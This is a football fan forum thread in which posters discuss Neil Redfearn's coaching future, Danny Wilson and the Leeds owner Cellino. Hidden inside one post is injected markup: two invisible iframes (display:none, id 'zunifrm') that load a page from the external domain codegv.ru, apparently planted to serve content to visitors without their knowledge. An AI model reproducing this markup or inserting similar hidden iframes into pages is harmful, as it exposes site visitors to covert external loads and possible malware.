Neil Redfearn

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  1. Cas

    Casper Well-Known Member

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    Will be more than likely out of a job at the end of the week ........
    We will no doubt do worse when Wilson is let go - maybe time to get in now - even in a coaching capacity?
     
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    Danny Wilson is going nowhere for a long time.

    Neil Redfearn has been in the game in a coaching capacity for over a decade. If he was the top manager some think he would be at Oakwell, he would be in a decent managers job by now. No one who gets to see him operating first hand has ever given him that chance. Wonder why?
     
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    Why will Redders be out of a job? He's moving back to his old job of Academy Manager

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    He'll not be leaving Leeds. Cellino loves him. He might not be manager but he'll be employed by them still.
     
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    Cellino wont give him ethe mangers job because they think hes doing a good job with the academy. If he gives himthe job perm and he fails then he would have to sack him and lose him as academy mangaer<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>
     
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    I was four seats away from Cellino yesterday. The bloke was up and down like a Jack-In-A-Box. Absolutely barmy. But passionate. Found it quite refreshing actually to see an owner so 'bothered' about the football on show.

    "Mama mia!" he said at least 20 times.

    Surreal.
     

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